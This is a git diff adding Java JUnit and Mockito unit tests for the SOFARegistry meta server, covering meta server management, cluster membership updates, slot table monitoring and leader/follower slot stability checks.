/dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaServerManagerTest.java @@ -0,0 +1,86 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.impl.DefaultCrossDcMetaServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import org.assertj.core.util.Lists; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class DefaultMetaServerManagerTest extends AbstractMetaServerTestBase { + + @Mock private DefaultCrossDcMetaServerManager crossDcMetaServerManager; + + @Mock private CurrentDcMetaServer currentDcMetaServer; + + @Mock private SessionServerManager sessionServerManager; + + @Mock private DataServerManager dataServerManager; + + @Mock private NodeConfig nodeConfig; + + private DefaultMetaServerManager manager; + + @Before + public void beforeDefaultMetaServerManagerTest() { + MockitoAnnotations.initMocks(this); + manager = new DefaultMetaServerManager(); + manager + .setCrossDcMetaServerManager(crossDcMetaServerManager) + .setCurrentDcMetaServer(currentDcMetaServer) + .setSessionManager(sessionServerManager) + .setDataServerManager(dataServerManager) + .setNodeConfig(nodeConfig); + } + + @Test + public void testGetSummary() { + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), Lists.newArrayList())); + manager.getSummary(Node.NodeType.DATA); + verify(dataServerManager, times(1)).getDataServerMetaInfo(); + verify(sessionServerManager, never()).getSessionServerMetaInfo(); + } + + @Test + public void testGetSummary2() { + when(sessionServerManager.getSessionServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), Lists.newArrayList())); + manager.getSummary(Node.NodeType.SESSION); + // verify(sessionManager, times(1)).getClusterMembers(); + verify(dataServerManager, never()).getDataServerMetaInfo(); + } + + @Test + public void testGetSummary3() { + manager.getSummary(Node.NodeType.META); + verify(currentDcMetaServer, times(1)).getClusterMembers(); + verify(sessionServerManager, never()).getSessionServerMetaInfo(); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/LocalMetaServerTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/LocalMetaServerTest.java new file mode 100644 index 000000000..61a9f6b0e --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/metaserver/impl/LocalMetaServerTest.java @@ -0,0 +1,187 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import java.util.Collections; +import java.util.List; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.CyclicBarrier; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.TimeoutException; +import org.assertj.core.util.Lists; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; +import org.mockito.Mock; +import org.mockito.MockitoAnnotations; + +public class LocalMetaServerTest extends AbstractMetaServerTestBase { + + private LocalMetaServer metaServer; + + private SlotManager slotManager; + + @Mock private DataServerManager dataServerManager; + + @Mock private SessionServerManager sessionServerManager; + + @Before + public void beforeDefaultLocalMetaServerTest() throws Exception { + MockitoAnnotations.initMocks(this); + slotManager = spy(new SimpleSlotManager()); + metaServer = spy(new LocalMetaServer(slotManager, dataServerManager, sessionServerManager)); + LifecycleHelper.initializeIfPossible(metaServer); + LifecycleHelper.startIfPossible(metaServer); + } + + @After + public void afterDefaultLocalMetaServerTest() throws Exception { + LifecycleHelper.stopIfPossible(metaServer); + LifecycleHelper.disposeIfPossible(metaServer); + } + + @Test + public void testGetSlotTable() { + when(slotManager.getSlotTable()).thenReturn(new SlotTable(0L, Collections.emptyList())); + metaServer.getSlotTable(); + verify(slotManager, times(1)).getSlotTable(); + } + + @Test + public void testGetClusterMembers() throws TimeoutException, InterruptedException { + List metaNodeList = + Lists.newArrayList( + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc()), + new MetaNode(randomURL(randomIp()), getDc())); + metaServer.updateClusterMembers(new VersionedList<>(DatumVersionUtil.nextId(), metaNodeList)); + waitConditionUntilTimeOut(() -> !metaServer.getClusterMembers().isEmpty(), 100); + metaNodeList.sort(new NodeComparator()); + List actual = metaServer.getClusterMembers(); + actual.sort(new NodeComparator()); + Assert.assertEquals(metaNodeList, actual); + } + + @Test + public void testUpdateClusterMembers() throws InterruptedException { + int tasks = 1000; + CyclicBarrier barrier = new CyclicBarrier(tasks); + CountDownLatch latch = new CountDownLatch(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + } catch (Exception ignore) { + } + + metaServer.updateClusterMembers( + new VersionedList<>( + DatumVersionUtil.nextId(), + Lists.newArrayList( + new MetaNode(randomURL(), getDc()), + new MetaNode(randomURL(), getDc()), + new MetaNode(randomURL(), getDc())))); + latch.countDown(); + } + }); + } + latch.await(2, TimeUnit.SECONDS); + verify(metaServer, times(tasks)).updateClusterMembers(any()); + } + + @Test + public void testRenew() throws InterruptedException { + int tasks = 1000; + CyclicBarrier barrier = new CyclicBarrier(tasks); + CountDownLatch latch = new CountDownLatch(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + } catch (Exception ignore) { + } + metaServer.renew(new MetaNode(randomURL(), getDc())); + latch.countDown(); + } + }); + } + latch.await(2, TimeUnit.SECONDS); + verify(metaServer, times(tasks)).renew(any()); + } + + @Test + public void testCancel() throws InterruptedException { + int tasks = 1000; + CyclicBarrier barrier = new CyclicBarrier(tasks); + CountDownLatch latch = new CountDownLatch(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier.await(); + } catch (Exception ignore) { + } + metaServer.renew(new MetaNode(randomURL(), getDc())); + latch.countDown(); + } + }); + } + latch.await(2, TimeUnit.SECONDS); + verify(metaServer, times(tasks)).renew(any()); + + CyclicBarrier barrier2 = new CyclicBarrier(tasks); + CountDownLatch latch2 = new CountDownLatch(tasks); + for (int i = 0; i < tasks; i++) { + executors.execute( + new Runnable() { + @Override + public void run() { + try { + barrier2.await(); + } catch (Exception ignore) { + } + metaServer.cancel(new MetaNode(randomURL(), getDc())); + latch2.countDown(); + } + }); + } + latch2.await(2, TimeUnit.SECONDS); + Thread.sleep(50); + verify(metaServer, times(tasks)).cancel(any()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/DefaultSlotTableMonitorTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/DefaultSlotTableMonitorTest.java new file mode 100644 index 000000000..7b6110abc --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/DefaultSlotTableMonitorTest.java @@ -0,0 +1,274 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.*; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfigBean; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.monitor.impl.DefaultSlotTableMonitor; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.After; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class DefaultSlotTableMonitorTest extends AbstractMetaServerTestBase { + + private DefaultSlotTableMonitor monitor = new DefaultSlotTableMonitor(); + + private SimpleSlotManager slotManager; + + private List dataNodes; + + @Before + public void beforeDefaultSlotTableMonitorTest() throws Exception { + NodeConfig nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + slotManager = spy(slotManager); + monitor.setSlotManager(slotManager); + monitor.setMetaServerConfig(new MetaServerConfigBean()); + monitor.postConstruct(); + } + + @After + public void afterDefaultSlotTableMonitorTest() throws Exception { + monitor.preDestroy(); + } + + @Test + public void testRecordSlotTable() { + monitor.recordSlotTable(); + verify(slotManager, atLeast(1)).getSlotTable(); + } + + @Test + public void testUpdate() { + slotManager.refresh(randomSlotTable()); + verify(slotManager, atLeast(1)).getSlotTable(); + } + + @Test + public void testIsSlotTableStable() { + monitor.update(slotManager, slotManager.getSlotTable()); + Assert.assertFalse(monitor.isStableTableStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + dataNodeSlot + .getFollowers() + .forEach( + slotId -> { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + System.currentTimeMillis(), + System.currentTimeMillis())); + }); + monitor.onHeartbeat( + new HeartbeatRequest( + dataNode, + slotManager.getSlotTable().getEpoch(), + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC), + slotStatuses)); + } + Assert.assertTrue(monitor.isStableTableStable()); + + final boolean[] unstable = {false}; + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + if (!unstable[0]) { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.UNHEALTHY)); + unstable[0] = true; + } else { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + } + }); + dataNodeSlot + .getFollowers() + .forEach( + slotId -> { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + System.currentTimeMillis(), + System.currentTimeMillis())); + }); + monitor.onHeartbeat( + new HeartbeatRequest( + dataNode, + slotManager.getSlotTable().getEpoch(), + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC), + slotStatuses)); + } + Assert.assertFalse(monitor.isStableTableStable()); + } + + @Test + public void testOnHeartbeatWithPrevEpoch() { + monitor.update(slotManager, slotManager.getSlotTable()); + Assert.assertFalse(monitor.isStableTableStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + monitor.onHeartbeat( + new HeartbeatRequest( + dataNode, + slotTable.getEpoch() - 1, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC), + slotStatuses)); + } + Assert.assertFalse(monitor.isStableTableStable()); + } + + @Test + public void testUpdateSlotTableThenIsStableShouldBeFalse() { + monitor.update(slotManager, slotManager.getSlotTable()); + Assert.assertFalse(monitor.isStableTableStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + dataNodeSlot + .getFollowers() + .forEach( + slotId -> { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + System.currentTimeMillis(), + System.currentTimeMillis())); + }); + monitor.onHeartbeat( + new HeartbeatRequest( + dataNode, + slotManager.getSlotTable().getEpoch(), + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC), + slotStatuses)); + } + Assert.assertTrue(monitor.isStableTableStable()); + + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + monitor.update(slotManager, slotManager.getSlotTable()); + Assert.assertFalse(monitor.isStableTableStable()); + } + + @Test + public void testReportDataServerLag() { + String ip = randomIp(); + monitor.onHeartbeat( + new HeartbeatRequest( + new DataNode(randomURL(ip), getDc()), + -1L, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC), + Lists.newArrayList())); + monitor.onHeartbeat( + new HeartbeatRequest( + new DataNode(randomURL(ip), getDc()), + -1L, + getDc(), + System.currentTimeMillis(), + new SlotConfig.SlotBasicInfo( + SlotConfig.SLOT_NUM, SlotConfig.SLOT_REPLICAS, SlotConfig.FUNC), + Lists.newArrayList())); + Assert.assertTrue(Metrics.DataSlot.getDataServerSlotLagTimes(ip) > 1); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/data/DataServerStatsTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/data/DataServerStatsTest.java new file mode 100644 index 000000000..c986fa23f --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/data/DataServerStatsTest.java @@ -0,0 +1,53 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.data; + +import static org.junit.Assert.*; + +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class DataServerStatsTest { + + private Logger logger = LoggerFactory.getLogger(DataServerStatsTest.class); + + @Test + public void testSimpleCase() { + DataServerStats dataServerStats = + new DataServerStats( + "127.0.0.1", + 1, + Lists.newArrayList( + new LeaderSlotStatus(2, 1, "127.0.0.1", BaseSlotStatus.LeaderStatus.UNHEALTHY), + new FollowerSlotStatus( + 1, + 1, + "127.0.0.1", + System.currentTimeMillis() - 1, + System.currentTimeMillis()))); + Assert.assertEquals("127.0.0.1", dataServerStats.getDataServer()); + Assert.assertEquals(1, dataServerStats.getSlotTableEpoch()); + Assert.assertEquals(2, dataServerStats.getSlotStatus().size()); + logger.info("{}", dataServerStats); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotStatsTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotStatsTest.java new file mode 100644 index 000000000..b6b1dd636 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotStatsTest.java @@ -0,0 +1,104 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.impl; + +import com.alipay.sofa.registry.common.model.slot.BaseSlotStatus; +import com.alipay.sofa.registry.common.model.slot.FollowerSlotStatus; +import com.alipay.sofa.registry.common.model.slot.LeaderSlotStatus; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.server.meta.monitor.SlotStats; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author zhuchen + * @date Mar 2, 2021, 11:10:58 AM + */ +public class DefaultSlotStatsTest { + + private DefaultSlotStats slotStats; + + private Slot slot; + + @Before + public void beforeDefaultSlotStatsTest() { + slot = + new Slot( + 1, "10.0.0.1", System.currentTimeMillis(), Lists.newArrayList("10.0.0.2", "10.0.0.3")); + slotStats = new DefaultSlotStats(slot, 1000 * 60 * 3); + } + + @Test + public void testGetSlot() { + Assert.assertEquals(slot, slotStats.getSlot()); + } + + @Test + public void testIsLeaderStable() { + Assert.assertFalse(slotStats.isLeaderStable()); + slotStats.updateLeaderState( + new LeaderSlotStatus( + 1, System.currentTimeMillis(), "10.0.0.1", BaseSlotStatus.LeaderStatus.HEALTHY)); + Assert.assertTrue(slotStats.isLeaderStable()); + } + + @Test + public void testIsFollowerStable() { + Assert.assertFalse(slotStats.isFollowerStable(null)); + Assert.assertFalse(slotStats.isFollowerStable("")); + Assert.assertFalse(slotStats.isFollowerStable("10.0.0.2")); + slotStats.updateFollowerState( + new FollowerSlotStatus(1, System.currentTimeMillis(), "10.0.0.2", -1, -1)); + Assert.assertFalse(slotStats.isFollowerStable("10.0.0.2")); + slotStats.updateFollowerState( + new FollowerSlotStatus( + 1, + System.currentTimeMillis(), + "10.0.0.2", + System.currentTimeMillis(), + System.currentTimeMillis() - 3000)); + Assert.assertTrue(slotStats.isFollowerStable("10.0.0.2")); + + Assert.assertFalse(slotStats.isFollowersStable()); + + slotStats.updateFollowerState( + new FollowerSlotStatus( + 1, + System.currentTimeMillis(), + "10.0.0.3", + System.currentTimeMillis(), + System.currentTimeMillis() - 3000)); + Assert.assertTrue(slotStats.isFollowersStable()); + } + + @Test + public void testUpdateFollowerState() { + slotStats.updateFollowerState( + new FollowerSlotStatus(1, System.currentTimeMillis(), "10.0.0.2", -1, -1)); + Assert.assertFalse(slotStats.isFollowerStable("10.0.0.2")); + } + + @Test + public void testEuqals() { + SlotStats slotStatsCopy = new DefaultSlotStats(slotStats.getSlot(), 3000); + slotStats.updateFollowerState( + new FollowerSlotStatus(1, System.currentTimeMillis(), "10.0.0.2", -1, -1)); + Assert.assertNotEquals(slotStatsCopy, slotStats); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableStatsTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableStatsTest.java new file mode 100644 index 000000000..5d4bad34b --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/monitor/impl/DefaultSlotTableStatsTest.java @@ -0,0 +1,345 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor.impl; + +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.*; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfigBean; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.monitor.SlotStats; +import com.alipay.sofa.registry.server.meta.slot.manager.SimpleSlotManager; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import java.util.List; +import java.util.Map; +import java.util.Set; +import org.assertj.core.util.Lists; +import org.assertj.core.util.Sets; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +public class DefaultSlotTableStatsTest extends AbstractMetaServerTestBase { + + private SimpleSlotManager slotManager; + + private List dataNodes; + + private DefaultSlotTableStats slotTableStats; + + private NodeConfig nodeConfig; + + @Before + public void beforeDefaultSlotTableMonitorTest() throws Exception { + nodeConfig = mock(NodeConfig.class); + when(nodeConfig.getLocalDataCenter()).thenReturn(getDc()); + slotManager = new SimpleSlotManager(); + slotTableStats = new DefaultSlotTableStats(slotManager, new MetaServerConfigBean()); + dataNodes = + Lists.newArrayList( + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc()), + new DataNode(randomURL(randomIp()), getDc())); + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + slotTableStats.initialize(); + } + + @Test + public void testIsSlotTableStable() { + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + } + + @Test + public void testCheckSlotStatuses() { + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch() - 1, + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + } + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + } + + @Test + public void testUpdateSlotTable() { + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + SlotTable slotTable = slotManager.getSlotTable(); + for (DataNode dataNode : dataNodes) { + List slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotTable.transfer(dataNode.getIp(), false).get(0); + dataNodeSlot + .getLeaders() + .forEach( + slotId -> { + slotStatuses.add( + new LeaderSlotStatus( + slotId, + slotTable.getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + BaseSlotStatus.LeaderStatus.HEALTHY)); + }); + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotLeadersStable()); + + slotManager.refresh(new SlotTableGenerator(dataNodes).createSlotTable()); + slotTableStats.updateSlotTable(slotManager.getSlotTable()); + Assert.assertFalse(slotTableStats.isSlotLeadersStable()); + } + + @Test + public void testDataReportHeartbeatWhenInit() throws InitializeException { + slotManager = new SimpleSlotManager(); + slotTableStats = new DefaultSlotTableStats(slotManager, new MetaServerConfigBean()); + slotTableStats.initialize(); + List slotStatuses = Lists.newArrayList(); + for (int slotId = 0; slotId < SlotConfig.SLOT_NUM; slotId++) { + slotStatuses.add( + new LeaderSlotStatus(slotId, 0, randomIp(), BaseSlotStatus.LeaderStatus.UNHEALTHY)); + } + slotTableStats.checkSlotStatuses(new DataNode(randomURL(randomIp()), getDc()), slotStatuses); + } + + @Test + public void testFollowerStatus() { + MetaServerConfigBean configBean = new MetaServerConfigBean(); + Assert.assertFalse(slotTableStats.isSlotFollowersStable()); + DataNode dataNode = new DataNode(randomURL(randomIp()), getDc()); + List slotStatuses = Lists.newArrayList(); + for (int slotId = 0; slotId < SlotConfig.SLOT_NUM; slotId++) { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotManager.getSlotTable().getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + System.currentTimeMillis(), + -1)); + } + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + Assert.assertFalse(slotTableStats.isSlotFollowersStable()); + + slotStatuses = Lists.newArrayList(); + for (int slotId = 0; slotId < SlotConfig.SLOT_NUM; slotId++) { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotManager.getSlotTable().getSlot(slotId).getLeaderEpoch(), + dataNode.getIp(), + System.currentTimeMillis(), + System.currentTimeMillis() - configBean.getDataReplicateMaxGapMillis())); + } + slotTableStats.checkSlotStatuses(dataNode, slotStatuses); + Assert.assertFalse(slotTableStats.isSlotFollowersStable()); + + logger.info(remarkableMessage("[splitter]")); + for (DataNode node : dataNodes) { + slotStatuses = Lists.newArrayList(); + DataNodeSlot dataNodeSlot = slotManager.getDataNodeManagedSlot(node.getIp(), false); + for (int slotId : dataNodeSlot.getFollowers()) { + slotStatuses.add( + new FollowerSlotStatus( + slotId, + slotManager.getSlotTable().getSlot(slotId).getLeaderEpoch(), + node.getIp(), + System.currentTimeMillis(), + System.currentTimeMillis() - 1000)); + } + slotTableStats.checkSlotStatuses(node, slotStatuses); + } + Assert.assertTrue(slotTableStats.isSlotFollowersStable()); 